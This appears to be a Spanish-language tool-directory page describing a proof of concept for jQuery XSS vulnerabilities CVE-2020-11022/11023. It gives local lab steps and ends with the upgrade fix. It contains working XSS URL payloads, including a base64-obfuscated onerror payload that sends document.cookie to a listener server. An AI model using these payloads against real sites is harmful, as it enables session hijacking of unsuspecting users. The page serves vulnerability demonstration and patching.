Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-11022-CVE-2020-11023 — Pequeña cosa montada rápidamente para demostrar esta CVE | Kitploit
Herramientas/GitHubGitHub/0xaj2k/cve-2020-11022-cve-2020-11023
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHub0xaj2k/cve-2020-11022-cve-2020-11023

CVE-2020-11022-CVE-2020-11023

Pequeña cosa montada rápidamente para demostrar esta CVE

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
35412hace 4 añosRevisado por Kitploit

CVE-2020-11022 CVE-2020-11023

En versiones de jQuery mayores o iguales a 1.2 y anteriores a 3.5.0, pasar HTML de fuentes no confiables, incluso después de sanitizarlo, a uno de los métodos de manipulación del DOM de jQuery (es decir, .html(), .append() y otros) puede ejecutar código no confiable. Este problema está corregido en jQuery 3.5.0.

En versiones de jQuery mayores o iguales a 1.0.3 y anteriores a 3.5.0, pasar HTML que contenga elementos de fuentes no confiables, incluso después de sanitizarlo, a uno de los métodos de manipulación del DOM de jQuery (es decir, .html(), .append() y otros) puede ejecutar código no confiable. Este problema está corregido en jQuery 3.5.0.

Explotación

  1. Aloja la página index.php en un servidor web PHP. Sugiero usar sudo php -S 127.0.0.1:80 para iniciar un servidor rápido.

XSS Simple

  1. Visita la ruta http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E
  2. Presiona el botón "Añadir mediante .html()".
  3. Observa la ventana emergente de alerta.

image

Robo de cookies

  1. Inicia otro servidor web en el puerto 8085, sugiero usar Python para esto sudo python3 -m http.server 8085
  2. Visita la ruta http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E
  3. Presiona el botón "Añadir mediante .html()".
  4. Revisa los registros de Python y mira tu cookie en el registro.

image

Solución

Si deseas solucionar este CVE en este script, simplemente cambia la versión de jQuery a https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js :)

Descargar herramienta